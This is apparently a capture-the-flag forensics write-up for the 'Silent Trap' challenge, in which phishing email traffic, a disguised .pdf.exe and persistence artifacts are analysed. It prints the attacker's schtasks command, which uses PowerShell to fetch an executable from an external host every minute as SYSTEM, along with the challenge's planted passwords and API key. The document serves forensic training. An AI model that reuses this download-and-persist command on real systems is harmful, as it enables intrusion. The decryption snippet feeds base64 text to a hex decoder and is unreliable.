2025 Cyber Apocalypse: Silent Trap

Challenge Information

Attribute	Details
Event	2025 Cyber Apocalypse
Category	Forensics
Challenge	Silent Trap

Silent Trap is a comprehensive forensics challenge that simulates a targeted attack against a game development studio in the fictional world of Eldoria. Thousands of players are trapped in the virtual world after attackers compromised developers’ and system administrators’ computers. Through network packet analysis and system artifact examination, investigators must uncover the attack chain, identify malware, extract credentials, and reveal the attacker’s objectives.

Analysis

Incident Timeline

Attack Chain:

Attacker sends phishing email to developer
Developer opens attachment (Eldoria_Balance_Issue_Report.zip)
Malware extracted and executed
System compromised and attacker gains persistence
Attacker schedules tasks and conducts reconnaissance
Additional tools deployed from external source

Evidence Collected

Questions to Answer:

What is the subject of the first email opened by the victim? Game Crash on Level 5
When was the suspicious email sent? 2025-02-24_15:46
MD5 hash of malware file? c0b37994963cc0aadd6e78a256c51547
Attacker’s email credentials? proplayer@email.com:completed
Scheduled task name? Synchronization
Leaked API key? sk-3498fwe09r8fw3f98fw9832fw

Solution

Step 1: IMAP Traffic Analysis

Examine email communication to identify the attack vector:

# Filter IMAP traffic from network capture
tshark -r capture.pcapng -Y "imap" -T fields -e imap.request

Key Findings:

Attacker logged in as proplayer@email.com with password completed
Subject: “Game Crash on Level 5” (First email opened/replied to)
Sent: 2025-02-24_15:46
Contains malicious attachment: Eldoria_Balance_Issue_Report.zip

Step 2: Malware Analysis

Extract and analyze the malware file:

File: Eldoria_Balance_Issue_Report.pdf.exe

# Get file hash
md5sum Eldoria_Balance_Issue_Report.pdf.exe
# Output: c0b37994963cc0aadd6e78a256c51547

# Extract strings
rabin2 -I Eldoria_Balance_Issue_Report.pdf.exe

# Decompile
ilspycmd -o DecompiledSource Eldoria_Balance_Issue_Report.pdf.exe

Malware Behavior:

Executed arbitrary PowerShell commands
Created persistence mechanisms
Scheduled tasks for command execution

Step 3: Credential Extraction

From network traffic and memory artifacts:

# Extract IMAP credentials from network stream
tcp.stream eq 13

# Attacker credentials found
LOGIN proplayer@email.com completed

Extracted Credentials:

Email: proplayer@email.com
Password: completed

Step 4: Task Scheduler Analysis

Analyze scheduled tasks created by attacker:

# Scheduled task for command execution
schtasks /create /tn Synchronization
/tr "powershell.exe -ExecutionPolicy Bypass -Command Invoke-WebRequest
-Uri https://www.mediafire.com/view/wlq9mlfrl0nlcuk/rakalam.exe/file
-OutFile C:\Temp\rakalam.exe" /sc minute /mo 1 /ru SYSTEM

Task Details:

Name: Synchronization
Purpose: Download additional malware every minute
Privilege: SYSTEM
Source: MediaFire (external)

Step 5: File System Analysis

Examine compromised system files:

# Credentials file located in backups
more C:\backups\credentials.txt

# Output:
[Database Server]
host=db.internal.korptech.net
username=dbadmin
password=rY?ZY_65P4V0

[Game API]
host=api.korptech.net
api_key=sk-3498fwe09r8fw3f98fw9832fw

[SSH Access]
host=dev-build.korptech.net
username=devops
password=BuildServer@92|7Gy1lz'Xb
port=2022

Step 6: Decryption of Encrypted Commands

Some attacker commands were XOR-encrypted in the network traffic:

# XOR key identified from network analysis
xor_key = bytes.fromhex(
    "A8 73 AE D5 A8 DE 48 24 5B D1 F2 80 45 63 C3 A4 EE B6 43 5C "
    "07 79 A4 56 79 0A 5D 04 8C 6F F8 2C 1E 5E 30 36 2D 64 B8 36 "
    "1C 52 C9 BC CB 96 7B A3 E5 8A B1 33 A4 E8 56 9A B3 8F 90 16 "
    "86 0C 28 F3 37 02 49 67 63 F3 EC 77 09 78 F7 19 84 89 43 42 "
    "6F F0 6C 56 55 3F 2C 31 F1 06 03 AA 83 96 35 31 7E 48 3C 24 "
    "90 F8 37 0A F1 D0 A3 D9 31 9A CE E3 19 63 12 90 86 A9 ED 64 "
    "75 16 0B 96 9D E6 AD 26 48 63 81 1E DC 70 E2 38 10 72 85 16 "
    "60 01 5A 48 A2 26 8F BA 23 8E 80 EA C4 EF 86 B2 CD E5 79 E1 "
    "F6 E8 CD EC FE 98 91 62 7E 1D D9 4A B1 8E 13 BE B6 97 E9 9D "
    "4C 4A 68 9B 4F 73 05 12 CC 41 FE CC 76 47 5C 21 3A 70 CE 97 "
    "67 B3 18 A4 DB 62 51 06 F1 64 E4 BE 60 8C 80 01 A1 F6 EC 19 "
    "3E 64 57 91 B9 2D 3D 8F 34 08 E3 20 E9 25 B7 65 59 18 7D CB "
    "E3 09 92 9C D0 CE C2 86 C2 17 E9 64 26 9E 3A 9F"
)

# Decrypt commands
encrypted = bytes.fromhex("dG6eWp6GbD/UmoUXLWq2NQ/hE4n5vgwcJtKvpqDisLc...")
decrypted = bytes(e ^ xor_key[i % len(xor_key)] for i, e in enumerate(encrypted))

Key Findings Summary

Finding	Details
Attack Vector	Phishing email with malware attachment
First Email Subject	Game Crash on Level 5
Email Timestamp	2025-02-24 15:46
Malware Hash	c0b37994963cc0aadd6e78a256c51547
Attacker Email	proplayer@email.com:completed
Scheduled Task	Synchronization (downloads rakalam.exe)
Leaked API Key	sk-3498fwe09r8fw3f98fw9832fw
Compromise Scope	Database, API, and SSH credentials exposed

Key Takeaways

IMAP Analysis: Email protocols in captured traffic reveal attack vectors
Malware Attribution: File hashes and behavior analysis identify malware
Credential Theft: Attackers frequently target stored credentials on compromised systems
Persistence Mechanisms: Task scheduler abuse enables sustained access
Encryption Analysis: XOR encryption in attacker communications can be broken with key recovery
Credential Management: Never store credentials in plaintext files, even in backups
Defense Layering: Multiple systems were compromised due to shared credentials

Tools Used

Wireshark/tshark: Network packet analysis and IMAP protocol examination
Volatility: Memory forensics and artifact extraction
Strings/radare2: Malware analysis and binary examination
Python: Custom decryption and analysis scripts
CyberChef: Data format conversion and decoding

References

IMAP Protocol: https://tools.ietf.org/html/rfc3501
Network Forensics: https://www.wireshark.org/
Malware Analysis: https://www.malwarebytes.com/